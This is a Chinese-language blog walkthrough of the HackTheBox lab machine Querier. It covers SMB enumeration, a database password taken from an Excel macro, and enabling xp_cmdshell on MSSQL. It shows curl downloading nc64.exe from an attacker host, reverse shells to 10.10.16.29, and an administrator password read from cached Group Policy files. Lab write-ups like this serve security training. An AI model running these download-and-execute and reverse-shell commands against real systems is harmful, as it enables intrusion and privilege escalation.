HackTheBox Querier Walkthrough

发表评论

系统:windows
内容:mssql xp_cmdshell

端口扫描情况如下。

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.10.10.125:1433:
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-01-04T07:05:12+00:00; -7h00m00s from scanner time.
| ms-sql-info:
|   10.10.10.125:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-04T06:55:32
| Not valid after:  2055-01-04T06:55:32
| MD5:   6613:570a:3b9f:77b8:ed6e:3a43:0658:617a
|_SHA-1: 332a:bcc1:87d8:61cc:4ba6:e7cf:08d0:c95b:c570:b210
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

只有smb可以检索,以空账号检测smb分享。

~/D/q $smbclient -NL $IP

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk

进入smb分享中的Reports目录,空账号,密码随意。

~/D/q $smbclient  //$IP/Reports -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jan 29 00:23:48 2019
  ..                                  D        0  Tue Jan 29 00:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 23:21:34 2019

下载这个xlsm文件后,在宏里面可以查看到数据库连接代码。

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

连接数据库后,启用xp_cmdshell。

~/D/q $mssqlclient.py -windows-auth mssql-svc:'corporate568'@$IP
SQL (QUERIER\mssql-svc  dbo@master)> execute as login='sa'; exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE
SQL (sa  dbo@master)> execute as login='sa'; exec master..xp_cmdshell 'whoami'
output
-----------------
querier\mssql-svc

NULL

本地启用http服务器,将nc64.exe上传到靶机的可写目录,并得到rev shell。

SQL (sa  dbo@master)> execute as login='sa'; exec master..xp_cmdshell 'curl -o c:\users\mssql-svc\Documents\nc64.exe http://10.10.16.29/nc64.exe'
SQL (sa  dbo@master)> execute as login='sa'; exec master..xp_cmdshell 'c:\users\mssql-svc\Documents\nc64.exe 10.10.16.29 1234 -e cmd.exe'

在shell里上传并运行winPEAS64.exe,检索靶机可用信息,可以在文件里得到administrator的密码。

����������͹ Cached GPP Passwords

C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    Found C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    UserName: Administrator
    NewName: [BLANK]
    cPassword: MyUnclesAreMarioAndLuigi!!1!
    Changed: 2019-01-28 23:12:48
    Found C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    UserName: Administrator
    NewName: [BLANK]
    cPassword: MyUnclesAreMarioAndLuigi!!1!
    Changed: 2019-01-28 23:12:48

有了administrator的密码,上传RunasCs.exe,以administrator身份得到反弹shell。

c:\Users\mssql-svc\Documents>.\RunasCs.exe administrator MyUnclesAreMarioAndLuigi!!1!  cmd.exe -r 10.10.16.29:2234
.\RunasCs.exe administrator MyUnclesAreMarioAndLuigi!!1!  cmd.exe -r 10.10.16.29:2234
[*] Warning: LoadUserProfile failed due to insufficient permissions

[+] Running in session 0 with process function CreateProcessAsUserW()
[+] Using Station\Desktop: Service-0x0-20689$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 4640 created in background.
~/D/q $rlwrap nc -nlvp 2234
Listening on 0.0.0.0 2234
Connection received on 10.10.10.125 49736
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
whoami
querier\administrator
Post Views: 21

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注